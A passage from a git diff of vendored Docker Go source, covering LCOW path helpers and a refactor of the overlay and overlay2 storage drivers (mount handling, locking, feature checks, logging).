targ[t0:], nil +} + +func (l *lcowfs) Base(path string) string { + return pathpkg.Base(path) +} + +func (l *lcowfs) Dir(path string) string { + return pathpkg.Dir(path) +} + +func (l *lcowfs) Clean(path string) string { + return pathpkg.Clean(path) +} + +func (l *lcowfs) Split(path string) (dir, file string) { + return pathpkg.Split(path) +} + +func (l *lcowfs) Separator() byte { + return '/' +} + +func (l *lcowfs) Abs(path string) (string, error) { + // Abs is supposed to add the current working directory, which is meaningless in lcow. + // So, return an error. 
+ return "", ErrNotSupported +} + +// Implementation taken from the Go standard library +func (l *lcowfs) Walk(root string, walkFn filepath.WalkFunc) error { + info, err := l.Lstat(root) + if err != nil { + err = walkFn(root, nil, err) + } else { + err = l.walk(root, info, walkFn) + } + if err == filepath.SkipDir { + return nil + } + return err +} + +// walk recursively descends path, calling w. +func (l *lcowfs) walk(path string, info os.FileInfo, walkFn filepath.WalkFunc) error { + err := walkFn(path, info, nil) + if err != nil { + if info.IsDir() && err == filepath.SkipDir { + return nil + } + return err + } + + if !info.IsDir() { + return nil + } + + names, err := l.readDirNames(path) + if err != nil { + return walkFn(path, info, err) + } + + for _, name := range names { + filename := l.Join(path, name) + fileInfo, err := l.Lstat(filename) + if err != nil { + if err := walkFn(filename, fileInfo, err); err != nil && err != filepath.SkipDir { + return err + } + } else { + err = l.walk(filename, fileInfo, walkFn) + if err != nil { + if !fileInfo.IsDir() || err != filepath.SkipDir { + return err + } + } + } + } + return nil +} + +// readDirNames reads the directory named by dirname and returns +// a sorted list of directory entries. +func (l *lcowfs) readDirNames(dirname string) ([]string, error) { + f, err := l.Open(dirname) + if err != nil { + return nil, err + } + files, err := f.Readdir(-1) + f.Close() + if err != nil { + return nil, err + } + + names := make([]string, len(files), len(files)) + for i := range files { + names[i] = files[i].Name() + } + + sort.Strings(names) + return names, nil +} + +// Note that Go's filepath.FromSlash/ToSlash convert between OS paths and '/'. Since the path separator +// for LCOW (and Unix) is '/', they are no-ops. 
+func (l *lcowfs) FromSlash(path string) string { + return path +} + +func (l *lcowfs) ToSlash(path string) string { + return path +} + +func (l *lcowfs) Match(pattern, name string) (matched bool, err error) { + return pathpkg.Match(pattern, name) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go deleted file mode 100644 index 666a5c0e04..0000000000 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go +++ /dev/null @@ -1,174 +0,0 @@ -// +build linux - -package overlay - -import ( - "fmt" - "os" - "path/filepath" - "syscall" - "time" - - "github.com/docker/docker/pkg/pools" - "github.com/docker/docker/pkg/system" - rsystem "github.com/opencontainers/runc/libcontainer/system" -) - -type copyFlags int - -const ( - copyHardlink copyFlags = 1 << iota -) - -func copyRegular(srcPath, dstPath string, mode os.FileMode) error { - srcFile, err := os.Open(srcPath) - if err != nil { - return err - } - defer srcFile.Close() - - dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE, mode) - if err != nil { - return err - } - defer dstFile.Close() - - _, err = pools.Copy(dstFile, srcFile) - - return err -} - -func copyXattr(srcPath, dstPath, attr string) error { - data, err := system.Lgetxattr(srcPath, attr) - if err != nil { - return err - } - if data != nil { - if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil { - return err - } - } - return nil -} - -func copyDir(srcDir, dstDir string, flags copyFlags) error { - err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { - if err != nil { - return err - } - - // Rebase path - relPath, err := filepath.Rel(srcDir, srcPath) - if err != nil { - return err - } - - dstPath := filepath.Join(dstDir, relPath) - if err != nil { - return err - } - - stat, ok := f.Sys().(*syscall.Stat_t) - if !ok { - return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath) - 
} - - isHardlink := false - - switch f.Mode() & os.ModeType { - case 0: // Regular file - if flags&copyHardlink != 0 { - isHardlink = true - if err := os.Link(srcPath, dstPath); err != nil { - return err - } - } else { - if err := copyRegular(srcPath, dstPath, f.Mode()); err != nil { - return err - } - } - - case os.ModeDir: - if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) { - return err - } - - case os.ModeSymlink: - link, err := os.Readlink(srcPath) - if err != nil { - return err - } - - if err := os.Symlink(link, dstPath); err != nil { - return err - } - - case os.ModeNamedPipe: - fallthrough - case os.ModeSocket: - if rsystem.RunningInUserNS() { - // cannot create a device if running in user namespace - return nil - } - if err := syscall.Mkfifo(dstPath, stat.Mode); err != nil { - return err - } - - case os.ModeDevice: - if err := syscall.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil { - return err - } - - default: - return fmt.Errorf("Unknown file type for %s\n", srcPath) - } - - // Everything below is copying metadata from src to dst. All this metadata - // already shares an inode for hardlinks. - if isHardlink { - return nil - } - - if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil { - return err - } - - if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil { - return err - } - - // We need to copy this attribute if it appears in an overlay upper layer, as - // this function is used to copy those. It is set by overlay if a directory - // is removed and then re-created and should not inherit anything from the - // same dir in the lower dir. - if err := copyXattr(srcPath, dstPath, "trusted.overlay.opaque"); err != nil { - return err - } - - isSymlink := f.Mode()&os.ModeSymlink != 0 - - // There is no LChmod, so ignore mode for symlink.
Also, this - // must happen after chown, as that can modify the file mode - if !isSymlink { - if err := os.Chmod(dstPath, f.Mode()); err != nil { - return err - } - } - - // system.Chtimes doesn't support a NOFOLLOW flag atm - if !isSymlink { - aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) - mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec)) - if err := system.Chtimes(dstPath, aTime, mTime); err != nil { - return err - } - } else { - ts := []syscall.Timespec{stat.Atim, stat.Mtim} - if err := system.LUtimesNano(dstPath, ts); err != nil { - return err - } - } - return nil - }) - return err -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go index 121b72e2c3..0c2167f083 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go @@ -1,6 +1,6 @@ // +build linux -package overlay +package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay" import ( "bufio" @@ -10,17 +10,24 @@ import ( "os" "os/exec" "path" + "path/filepath" "strconv" - "syscall" + "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/copy" "github.com/docker/docker/daemon/graphdriver/overlayutils" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/fsutils" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/mount" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // This is a small wrapper over the NaiveDiffWriter that lets us have a custom @@ -90,6 +97,8 @@ 
func (d *naiveDiffDriverWithApply) ApplyDiff(id, parent string, diff io.Reader) // of that. This means all child images share file (but not directory) // data with the parent. +type overlayOptions struct{} + // Driver contains information about the home directory and the list of active mounts that are created using this driver. type Driver struct { home string @@ -97,6 +106,7 @@ type Driver struct { gidMaps []idtools.IDMap ctr *graphdriver.RefCounter supportsDType bool + locker *locker.Locker } func init() { @@ -104,15 +114,30 @@ func init() { } // Init returns the NaiveDiffDriver, a native diff driver for overlay filesystem. -// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. -// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +// If overlay filesystem is not supported on the host, the error +// graphdriver.ErrNotSupported is returned. +// If an overlay filesystem is not supported over an existing filesystem then +// error graphdriver.ErrIncompatibleFS is returned. func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + _, err := parseOptions(options) + if err != nil { + return nil, err + } if err := supportsOverlay(); err != nil { return nil, graphdriver.ErrNotSupported } - fsMagic, err := graphdriver.GetFSMagic(home) + // Perform feature detection on /var/lib/docker/overlay if it's an existing directory. + // This covers situations where /var/lib/docker/overlay is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. 
+ testdir := home + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) + } + + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -121,31 +146,30 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap } switch fsMagic { - case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs, graphdriver.FsMagicEcryptfs: - logrus.Errorf("'overlay' is not supported over %s", backingFs) + case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs, graphdriver.FsMagicNfsFs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs: + logrus.WithField("storage-driver", "overlay").Errorf("'overlay' is not supported over %s", backingFs) return nil, graphdriver.ErrIncompatibleFS } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + supportsDType, err := fsutils.SupportsDType(testdir) if err != nil { return nil, err } - // Create the driver home dir - if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { - return nil, err - } - - if err := mount.MakePrivate(home); err != nil { - return nil, err + if !supportsDType { + if !graphdriver.IsInitialized(home) { + return nil, overlayutils.ErrDTypeNotSupported("overlay", backingFs) + } + // allow running without d_type only for existing setups (#27443) + logrus.WithField("storage-driver", "overlay").Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs)) } - supportsDType, err := fsutils.SupportsDType(home) + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) if err != nil { return nil, err } - if !supportsDType { - // not a fatal error until v1.16 (#27443) - logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs)) + // Create the driver home dir + if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } d := &Driver{ @@ -154,11 
+178,28 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap gidMaps: gidMaps, ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), supportsDType: supportsDType, + locker: locker.New(), } return NaiveDiffDriverWithApply(d, uidMaps, gidMaps), nil } +func parseOptions(options []string) (*overlayOptions, error) { + o := &overlayOptions{} + for _, option := range options { + key, _, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return nil, err + } + key = strings.ToLower(key) + switch key { + default: + return nil, fmt.Errorf("overlay: unknown option %s", key) + } + } + return o, nil +} + func supportsOverlay() error { // We can try to modprobe overlay first before looking at // proc/filesystems for when overlay is supported @@ -176,7 +217,7 @@ func supportsOverlay() error { return nil } } - logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + logrus.WithField("storage-driver", "overlay").Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") return graphdriver.ErrNotSupported } @@ -193,7 +234,8 @@ func (d *Driver) Status() [][2]string { } } -// GetMetadata returns meta data about the overlay driver such as root, LowerDir, UpperDir, WorkDir and MergeDir used to store data. +// GetMetadata returns metadata about the overlay driver such as root, +// LowerDir, UpperDir, WorkDir and MergeDir used to store data. func (d *Driver) GetMetadata(id string) (map[string]string, error) { dir := d.dir(id) if _, err := os.Stat(dir); err != nil { @@ -226,7 +268,7 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // is being shutdown. For now, we just have to unmount the bind mounted // we had created. 
func (d *Driver) Cleanup() error { - return mount.Unmount(d.home) + return mount.RecursiveUnmount(d.home) } // CreateReadWrite creates a layer that is writable for use as a container @@ -249,10 +291,12 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr if err != nil { return err } - if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + root := idtools.IDPair{UID: rootUID, GID: rootGID} + + if err := idtools.MkdirAllAndChown(path.Dir(dir), 0700, root); err != nil { return err } - if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(dir, 0700, root); err != nil { return err } @@ -265,10 +309,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr // Toplevel images are just a "root" dir if parent == "" { - if err := idtools.MkdirAs(path.Join(dir, "root"), 0755, rootUID, rootGID); err != nil { - return err - } - return nil + return idtools.MkdirAndChown(path.Join(dir, "root"), 0755, root) } parentDir := d.dir(parent) @@ -282,19 +323,13 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr parentRoot := path.Join(parentDir, "root") if s, err := os.Lstat(parentRoot); err == nil { - if err := idtools.MkdirAs(path.Join(dir, "upper"), s.Mode(), rootUID, rootGID); err != nil { - return err - } - if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "upper"), s.Mode(), root); err != nil { return err } - if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil { return err } - if err := ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666); err != nil { - return err - } - return nil + return ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666) } // Otherwise, copy the upper and the 
lower-id from the parent @@ -315,17 +350,14 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr } upperDir := path.Join(dir, "upper") - if err := idtools.MkdirAs(upperDir, s.Mode(), rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(upperDir, s.Mode(), root); err != nil { return err } - if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { - return err - } - if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil { return err } - return copyDir(parentUpperDir, upperDir, 0) + return copy.DirCopy(parentUpperDir, upperDir, copy.Content, true) } func (d *Driver) dir(id string) string { @@ -334,37 +366,55 @@ func (d *Driver) dir(id string) string { // Remove cleans the directories that are created for this id. func (d *Driver) Remove(id string) error { - if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { - return err + if id == "" { + return fmt.Errorf("refusing to remove the directories: id is empty") } - return nil + d.locker.Lock(id) + defer d.locker.Unlock(id) + return system.EnsureRemoveAll(d.dir(id)) } // Get creates and mounts the required file system for the given id and returns the mount path. 
-func (d *Driver) Get(id string, mountLabel string) (s string, err error) { +func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, err error) { + d.locker.Lock(id) + defer d.locker.Unlock(id) dir := d.dir(id) if _, err := os.Stat(dir); err != nil { - return "", err + return nil, err } // If id has a root, just return it rootDir := path.Join(dir, "root") if _, err := os.Stat(rootDir); err == nil { - return rootDir, nil + return containerfs.NewLocalContainerFS(rootDir), nil } + mergedDir := path.Join(dir, "merged") if count := d.ctr.Increment(mergedDir); count > 1 { - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } defer func() { if err != nil { if c := d.ctr.Decrement(mergedDir); c <= 0 { - syscall.Unmount(mergedDir, 0) + if mntErr := unix.Unmount(mergedDir, 0); mntErr != nil { + logrus.WithField("storage-driver", "overlay").Debugf("Failed to unmount %s: %v: %v", id, mntErr, err) + } + // Cleanup the created merged directory; see the comment in Put's rmdir + if rmErr := unix.Rmdir(mergedDir); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithField("storage-driver", "overlay").Warnf("Failed to remove %s: %v: %v", id, rmErr, err) + } } } }() lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id")) if err != nil { - return "", err + return nil, err + } + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAndChown(mergedDir, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } var ( lowerDir = path.Join(d.dir(string(lowerID)), "root") @@ -372,33 +422,45 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { workDir = path.Join(dir, "work") opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", lowerDir, upperDir, workDir) ) - if err := syscall.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil { - return "", fmt.Errorf("error 
creating overlay mount to %s: %v", mergedDir, err) + if err := unix.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil { + return nil, fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) } // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a // user namespace requires this to move a directory from lower to upper. - rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) - if err != nil { - return "", err - } if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { - return "", err + return nil, err } - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } // Put unmounts the mount path created for the give id. +// It also removes the 'merged' directory to force the kernel to unmount the +// overlay mount in other namespaces. func (d *Driver) Put(id string) error { + d.locker.Lock(id) + defer d.locker.Unlock(id) // If id has a root, just return if _, err := os.Stat(path.Join(d.dir(id), "root")); err == nil { return nil } mountpoint := path.Join(d.dir(id), "merged") + logger := logrus.WithField("storage-driver", "overlay") if count := d.ctr.Decrement(mountpoint); count > 0 { return nil } - if err := syscall.Unmount(mountpoint, 0); err != nil { - logrus.Debugf("Failed to unmount %s overlay: %v", id, err) + if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil { + logger.Debugf("Failed to unmount %s overlay: %v", id, err) + } + + // Remove the mountpoint here. Removing the mountpoint (in newer kernels) + // will cause all other instances of this mount in other mount namespaces + // to be unmounted. This is necessary to avoid cases where an overlay mount + // that is present in another namespace will cause subsequent mounts + // operations to fail with ebusy. We ignore any errors here because this may + // fail on older kernels which don't have + // torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied. 
+ if err := unix.Rmdir(mountpoint); err != nil { + logger.Debugf("Failed to remove %s overlay: %v", id, err) } return nil } @@ -438,7 +500,7 @@ func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64 } }() - if err = copyDir(parentRootDir, tmpRootDir, copyHardlink); err != nil { + if err = copy.DirCopy(parentRootDir, tmpRootDir, copy.Hardlink, true); err != nil { return 0, err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go index 34b6d801fd..b270122c63 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go @@ -1,6 +1,6 @@ // +build linux -package overlay +package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay" import ( "testing" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go index 3dbb4de44e..8fc06ffecf 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go @@ -1,3 +1,3 @@ // +build !linux -package overlay +package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go index 53a7199292..d6ee42f47f 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go @@ -1,6 +1,6 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "fmt" @@ -10,29 +10,34 @@ import ( "path/filepath" "syscall" - 
"github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/system" "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) -// hasOpaqueCopyUpBug checks whether the filesystem has a bug +// doesSupportNativeDiff checks whether the filesystem has a bug // which copies up the opaque flag when copying up an opaque -// directory. When this bug exists naive diff should be used. -func hasOpaqueCopyUpBug(d string) error { +// directory or the kernel enable CONFIG_OVERLAY_FS_REDIRECT_DIR. +// When these exist naive diff should be used. +func doesSupportNativeDiff(d string) error { td, err := ioutil.TempDir(d, "opaque-bug-check") if err != nil { return err } defer func() { if err := os.RemoveAll(td); err != nil { - logrus.Warnf("Failed to remove check directory %v: %v", td, err) + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to remove check directory %v: %v", td, err) } }() - // Make directories l1/d, l2/d, l3, work, merged + // Make directories l1/d, l1/d1, l2/d, l3, work, merged if err := os.MkdirAll(filepath.Join(td, "l1", "d"), 0755); err != nil { return err } + if err := os.MkdirAll(filepath.Join(td, "l1", "d1"), 0755); err != nil { + return err + } if err := os.MkdirAll(filepath.Join(td, "l2", "d"), 0755); err != nil { return err } @@ -52,12 +57,12 @@ func hasOpaqueCopyUpBug(d string) error { } opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "l2"), path.Join(td, "l1"), path.Join(td, "l3"), path.Join(td, "work")) - if err := syscall.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { + if err := unix.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { return errors.Wrap(err, "failed to mount overlay") } defer func() { - if err := syscall.Unmount(filepath.Join(td, "merged"), 0); err != nil { - logrus.Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) + if err := unix.Unmount(filepath.Join(td, "merged"), 0); err != 
nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) } }() @@ -75,5 +80,55 @@ func hasOpaqueCopyUpBug(d string) error { return errors.New("opaque flag erroneously copied up, consider update to kernel 4.8 or later to fix") } + // rename "d1" to "d2" + if err := os.Rename(filepath.Join(td, "merged", "d1"), filepath.Join(td, "merged", "d2")); err != nil { + // if rename failed with syscall.EXDEV, the kernel doesn't have CONFIG_OVERLAY_FS_REDIRECT_DIR enabled + if err.(*os.LinkError).Err == syscall.EXDEV { + return nil + } + return errors.Wrap(err, "failed to rename dir in merged directory") + } + // get the xattr of "d2" + xattrRedirect, err := system.Lgetxattr(filepath.Join(td, "l3", "d2"), "trusted.overlay.redirect") + if err != nil { + return errors.Wrap(err, "failed to read redirect flag on upper layer") + } + + if string(xattrRedirect) == "d1" { + return errors.New("kernel has CONFIG_OVERLAY_FS_REDIRECT_DIR enabled") + } + + return nil +} + +// supportsMultipleLowerDir checks if the system supports multiple lowerdirs, +// which is required for the overlay2 driver. On 4.x kernels, multiple lowerdirs +// are always available (so this check isn't needed), and backported to RHEL and +// CentOS 3.x kernels (3.10.0-693.el7.x86_64 and up). This function is to detect +// support on those kernels, without doing a kernel version compare. 
+func supportsMultipleLowerDir(d string) error { + td, err := ioutil.TempDir(d, "multiple-lowerdir-check") + if err != nil { + return err + } + defer func() { + if err := os.RemoveAll(td); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to remove check directory %v: %v", td, err) + } + }() + + for _, dir := range []string{"lower1", "lower2", "upper", "work", "merged"} { + if err := os.Mkdir(filepath.Join(td, dir), 0755); err != nil { + return err + } + } + + opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "lower2"), path.Join(td, "lower1"), path.Join(td, "upper"), path.Join(td, "work")) + if err := unix.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { + return errors.Wrap(err, "failed to mount overlay") + } + if err := unix.Unmount(filepath.Join(td, "merged"), 0); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) + } return nil } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go index 60e248b6d7..da409fc81a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go @@ -1,6 +1,6 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "bytes" @@ -9,9 +9,9 @@ import ( "fmt" "os" "runtime" - "syscall" "github.com/docker/docker/pkg/reexec" + "golang.org/x/sys/unix" ) func init() { @@ -49,18 +49,19 @@ func mountFrom(dir, device, target, mType string, flags uintptr, label string) e output := bytes.NewBuffer(nil) cmd.Stdout = output cmd.Stderr = output - if err := cmd.Start(); err != nil { + w.Close() return fmt.Errorf("mountfrom error on re-exec cmd: %v", err) } //write the options to the pipe for the untar exec to read if 
err := json.NewEncoder(w).Encode(options); err != nil { + w.Close() return fmt.Errorf("mountfrom json encode to pipe failed: %v", err) } w.Close() if err := cmd.Wait(); err != nil { - return fmt.Errorf("mountfrom re-exec error: %v: output: %s", err, output) + return fmt.Errorf("mountfrom re-exec error: %v: output: %v", err, output) } return nil } @@ -80,7 +81,7 @@ func mountFromMain() { fatal(err) } - if err := syscall.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil { + if err := unix.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil { fatal(err) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go index 65ac6bfaeb..5108a2c055 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go @@ -1,9 +1,10 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "bufio" + "context" "errors" "fmt" "io" @@ -15,24 +16,26 @@ import ( "strconv" "strings" "sync" - "syscall" - - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/overlayutils" "github.com/docker/docker/daemon/graphdriver/quota" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/directory" "github.com/docker/docker/pkg/fsutils" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/system" "github.com/docker/go-units" - - "github.com/opencontainers/runc/libcontainer/label" + rsystem 
"github.com/opencontainers/runc/libcontainer/system" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) var ( @@ -74,7 +77,7 @@ const ( maxDepth = 128 // idLength represents the number of random characters - // which can be used to create the unique link identifer + // which can be used to create the unique link identifier // for every layer. If this value is too long then the // page size limit for the mount command may be exceeded. // The idLength should be selected such that following equation @@ -88,7 +91,8 @@ type overlayOptions struct { quota quota.Quota } -// Driver contains information about the home directory and the list of active mounts that are created using this driver. +// Driver contains information about the home directory and the list of active +// mounts that are created using this driver. type Driver struct { home string uidMaps []idtools.IDMap @@ -98,6 +102,7 @@ type Driver struct { options overlayOptions naiveDiff graphdriver.DiffDriver supportsDType bool + locker *locker.Locker } var ( @@ -112,9 +117,11 @@ func init() { graphdriver.Register(driverName, Init) } -// Init returns the a native diff driver for overlay filesystem. -// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. -// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +// Init returns the native diff driver for overlay filesystem. +// If overlay filesystem is not supported on the host, the error +// graphdriver.ErrNotSupported is returned. +// If an overlay filesystem is not supported over an existing filesystem then +// the error graphdriver.ErrIncompatibleFS is returned. 
func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { opts, err := parseOptions(options) if err != nil { @@ -130,14 +137,17 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap if err != nil { return nil, err } - if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 { - if !opts.overrideKernelCheck { - return nil, graphdriver.ErrNotSupported - } - logrus.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update") + + // Perform feature detection on /var/lib/docker/overlay2 if it's an existing directory. + // This covers situations where /var/lib/docker/overlay2 is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. + testdir := home + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) } - fsMagic, err := graphdriver.GetFSMagic(home) + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -145,33 +155,53 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap backingFs = fsName } - // check if they are running over 